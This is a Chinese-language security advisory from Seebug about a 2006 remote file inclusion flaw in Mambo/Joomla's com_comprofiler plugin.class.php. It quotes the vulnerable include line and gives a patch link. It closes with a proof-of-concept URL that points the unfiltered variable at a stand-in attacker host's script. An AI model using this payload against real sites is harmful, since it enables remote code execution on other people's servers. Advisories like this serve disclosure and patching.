Mambo/Joomla plugin.class.php脚本远程文件包含漏洞

2006-10-25T00:00:00
ID SSV:58
Type seebug
Reporter Root
Modified 2006-10-25T00:00:00

Description

Mambo(也被称为Joomla)是一款开放源代码的WEB内容管理系统。

Mambo在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。

在Mambo的com_comprofiler文件夹的plugin.class.php脚本中:

-----------------------plugin.class.php---------------------- <?php /* * Plugin handler * @package Joomla * @author various, JoomlaJoe and Beat /

require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' \ );


由于没有正确的过滤$mosConfig_absolute_path变量,导致了远程文件包含漏洞。攻击者可以利用这个漏洞执行任意代码。

Mambo com_comprofiler <= 1.0 RC2 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.joomlapolis.com/component/option,com_docman/task,cat_view/gid,46/Itemid,36/

                                        
                                            
                                                http://[target]/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= http://attacker.com/evil.txt?